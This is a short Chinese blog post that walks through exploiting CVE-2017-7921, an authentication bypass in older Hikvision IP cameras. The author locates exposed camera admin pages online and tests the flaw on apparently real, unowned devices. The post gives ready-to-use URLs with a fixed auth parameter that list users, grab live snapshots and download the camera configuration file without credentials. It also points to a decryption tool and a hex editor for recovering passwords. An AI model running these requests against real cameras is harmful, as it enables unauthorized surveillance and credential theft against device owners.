今天看到了海康威视又出了新漏洞——CVE-2021-36260,突然心血来潮想要复现一下,结果搜到了一个旧的漏洞——CVE-2017-7921,而且发现仍然有不少海康威视摄像头后台没有修补这个漏洞,于是就来记录一下复现过程。
先搜索海康威视的摄像头后台,页面内容包含Hikvison就能搜到,还是很容易的。至于具体方法相信安全人员都有自己的手段,就不细讲了。
浏览过几个后台就发现,旧设备和新设备的后台页面有很大区别,而旧设备的后台页面仍有不少都没修这个漏洞。
新设备页面
旧设备页面
接下来就好说了,随便找个旧设备页面验证漏洞就行了。
在web浏览器中输入以下代码来检索用户与用户列表
http://目的IP地址/Security/users?auth=YWRtaW46MTEK
我们可以知道这个摄像头有且只有一个用户名admin
在没有进行身份验证的情况下获取监控快照可以使用以下代码在浏览器中打开
http://目的IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK
浏览器返回结果如下
在没有验证的情况下需要使用如下代码来下载摄像头的配置文件
http://目的IP地址/System/configurationFile?auth=YWRtaW46MTEK
代码输入之后浏览器会自动下载一个名为configurationFile的文件,如下
现在我们已近获取到了摄像头的配置文件
在上面我们已近得到了海康威视摄像头的配置文件了,但是配置文件是加密过的,我们没有办法从中直接得到密码。所以我们需要先将配置文件进行解密,这里我们需要用到一个专门的海康威视配置文件解密工具
然后用C32 查下用户密码